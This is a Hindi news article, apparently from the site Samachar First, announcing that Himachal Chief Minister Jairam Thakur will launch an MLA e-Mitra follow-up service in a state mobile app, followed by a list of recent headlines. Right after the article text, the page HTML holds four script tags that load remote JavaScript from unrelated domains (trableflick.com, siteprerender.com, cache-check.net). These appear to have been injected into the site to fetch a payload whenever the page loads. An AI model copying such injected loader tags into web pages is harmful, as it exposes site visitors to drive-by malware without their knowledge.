मुख्यमंत्री जयराम ठाकुर करेंगे विधायक ई-मित्र सेवा का शुभारंभ

<p>राज्य सरकार के एक प्रवक्ता ने बताया कि मुख्यमंत्री जयराम ठाकुर 6 जनवरी, 2021 को अपने जन्मदिवस के उपलक्ष्य में विधायक ई-मित्र सेवा का शुभारम्भ करेंगे। उन्होंने कहा कि यह सुविधा सरकार द्वारा पहले से चलाई जा रही शिखर की ओर हिमाचल मोबाइल ऐप के माध्यम से प्रदान की जाएगी। इस ऐप में एमएलए कॉर्नर नाम से विधायकों को एक अतिरिक्त टैब में विधायक ई-मित्र सुविधा उपलब्ध करवाई जाएगी। विधायक ई-मित्र सेवा आरम्भ होने से विधायक ऑनलाइन अपने कार्य का फॉलो-अप कर सकेंगे। वर्तमान व्यवस्था के अनुसार, विधानसभा क्षेत्र की जनता अपने जन प्रतिनिधियों को जो मांगें रखती है, विधायक उन मांगों को मुख्यमंत्री में समक्ष रखते हैं। इसके बाद उन प्रस्तावों का फॉलो-अप करने के लिए विधायकों को अन्य कार्यालय से सम्पर्क करने में बहुत अधिक समय लग जाता था।</p>

<p><br />
उन्होंने कहा कि मुख्यमंत्री ने विधायकों के आग्रह पर अधिकारियों को निर्देश दिए थे कि ऐसी तकनीकी विकसित की जाए जिससे विधायकों को अपने प्रस्तावों को लेकर हो रही प्रगति की जानकारी प्राप्त करने के लिए विभिन्न कार्यालयों के चक्कर न काटने पड़ें। प्रवक्ता ने कहा कि इस सुविधा के प्रारंभ होने से मुख्यमंत्री कार्यालय स्वयं इसकी निगरानी करेगा। इससे समय की भी बचत होगी और पूरी जानकारी फोन के माध्यम से उपलब्ध रहेगी। प्रदेश में डिजिटल कार्य प्रणाली को बढ़ावा देने में यह सुविधा सहायक सिद्ध होगी। प्रदेश की अधिकतर जनता ने शिखर की ओर हिमाचल ऐप को डाउनलोड किया है, जिससे आम जनता आसानी से सरकार की हर गतिविधि की जानकारी केवल एक ऐप के माध्यम से प्राप्त कर पा रही है।</p>

<p><img src=”/media/gallery/images/image(1913).png” style=”height:110px; width:900px” /></p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1609727278174″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

28 सितंबर को शांतिपूर्ण प्रदर्शन, फैसला न आने पर जेल भरो आंदोलन

  Shimla: संजौली अवैध मस्जिद विवाद शांत नहीं हुआ है। 28 सितंबर को देवभूमि संघर्ष…

29 mins ago

कंगना का कांग्रेस पर करारा वार: कांग्रेस को बच्चे पालने का शौक, पप्पू और बहन की हरकतें बचकानी

  Mandi: मंडी के गोहर में एक कार्यक्रम में सांसद कंगना ने कांग्रेस के शीर्ष…

1 hour ago

पीएम मोदी कर रहे बदनाम, हिमाचलआर्थिक तंगी से नहीं जूझ रहा: डिप्टी सीएम

  Sirmour: उपमुख्यमंत्री मुकेश अग्निहोत्री ने आरोप लगाया है कि भाजपा के केंद्रीय व प्रदेश…

2 hours ago

स्वच्छ रहेगा घर, नगर व पंचायत तभी तो स्वस्थ रहेगा इंसान: उषा बिरला

  Hamirpur: ग्राम पंचायत दडूही में सोमवार को स्वच्छ भारत मिशन के तहत स्वच्छता पखवाड़ा…

2 hours ago

शहीदों को नमन, शहीद स्मारक पर दी गई श्रद्धांजलि

  Mandi: भूतपूर्व सैनिक लीग मंडी द्वारा सोमवार को मंडी के शहीद स्मारक में 1965…

3 hours ago

आरक्षण पर कुठाराघात, केंद्र सरकार पर प्रेम कौशल का निशाना

  Hamirpur: हिमाचल प्रदेश कांग्रेस के मुख्य प्रवक्ता प्रेम कौशल ने कहा कि दलित वर्ग…

3 hours ago